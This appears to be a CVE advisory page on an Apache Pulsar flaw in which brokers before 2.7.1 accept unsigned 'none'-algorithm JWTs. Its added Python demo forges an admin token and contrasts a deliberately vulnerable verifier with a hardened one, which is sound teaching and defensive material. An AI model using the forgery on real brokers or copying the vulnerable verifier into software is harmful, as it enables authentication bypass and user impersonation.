History: May 26, 2021 - 12:22 p.m.

CVE-2021-22160 Authentication with JWT allows use of “none”-algorithm

Source: apache (www.cve.org)
Tags: cve-2021-22160, authentication bypass, jwt, apache pulsar, json web tokens, signature validation, attack, pulsar instances, user impersonation

AI Score: 9.6 (Confidence: High)
EPSS: 0.017 (Percentile: 87.7%)

If Apache Pulsar is configured to authenticate clients with tokens based on JSON Web Tokens (JWT), the broker does not validate the token's signature when the presented token's header sets the algorithm to "none" (an unsecured JWT whose signature part is empty). Because no key is needed to produce such a token, an attacker who can reach a Pulsar instance can mint a token carrying arbitrary claims and connect as any user, including admins. Versions before 2.7.1 are affected.
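
As an added illustration of the flaw described above (constructed example code, not Pulsar's own token handling), the following Python mints a legitimate HS256 token, forges an unsigned alg=none token for arbitrary claims, and runs both through a verifier that lets the token's header pick the algorithm beside one that pins the algorithm server-side. The shared secret, claim names and function names are assumptions for the demo, and only HS256 is implemented; the "none" handling is the part that mirrors the advisory.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo secret; a real broker loads its own signing key.
SECRET = b"demo-shared-secret-not-for-production"


def b64url_encode(data: bytes) -> str:
    """JWT base64url: URL-safe alphabet with the '=' padding stripped."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; re-adds the padding the encoder dropped."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    """Compact JSON -> base64url, as used for the JWT header and payload parts."""
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Mint a legitimate HS256 token, the kind an operator would hand to a client."""
    header = encode_part({"alg": "HS256", "typ": "JWT"})
    payload = encode_part(claims)
    sig = hmac.new(secret, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def forge_none_token(claims: dict) -> str:
    """Attacker side: no key at all. The header claims alg=none and the signature part is empty."""
    header = encode_part({"alg": "none", "typ": "JWT"})
    payload = encode_part(claims)
    return f"{header}.{payload}."


def verify_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """Pre-fix shape of the bug: the token's own header decides the algorithm, and
    'none' is treated as 'nothing to check', so the claims are trusted as presented."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    claims = json.loads(b64url_decode(payload_b64))
    if header.get("alg") == "none":
        return claims  # the bug: an unsigned token is accepted as authenticated
    if header.get("alg") == "HS256":
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return claims
    return None


def verify_hardened(token: str, secret: bytes) -> Optional[dict]:
    """The verifier, not the token, decides the algorithm: require three parts,
    a non-empty signature, alg exactly HS256 and a matching HMAC before any claim is trusted."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return None  # empty signature part: the unsecured-JWT shape is rejected outright
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:  # covers bad base64 (binascii.Error) and bad JSON
        return None
    if header.get("alg") != "HS256":
        return None  # rejects "none", "None", "NONE" and any other algorithm swap
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    forged = forge_none_token({"sub": "admin"})
    print("forged token:", forged)
    print("vulnerable verifier:", verify_vulnerable(forged, SECRET))
    print("hardened verifier:  ", verify_hardened(forged, SECRET))
```

The forged token ends in a bare "." because the signature part is empty; that shape alone is a cheap first rejection rule, but the decisive fix is that the verifier pins the accepted algorithm instead of reading it from the untrusted header. For Pulsar itself the remedy is the upgrade named in the affected-versions block (2.7.1 or later).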

CNA Affected

[
  {
    "product": "Apache Pulsar",
    "vendor": "Apache Software Foundation",
    "versions": [
      {
        "lessThan": "2.7.1",
        "status": "affected",
        "version": "Apache Pulsar",
        "versionType": "custom"
      }
    ]
  }
]
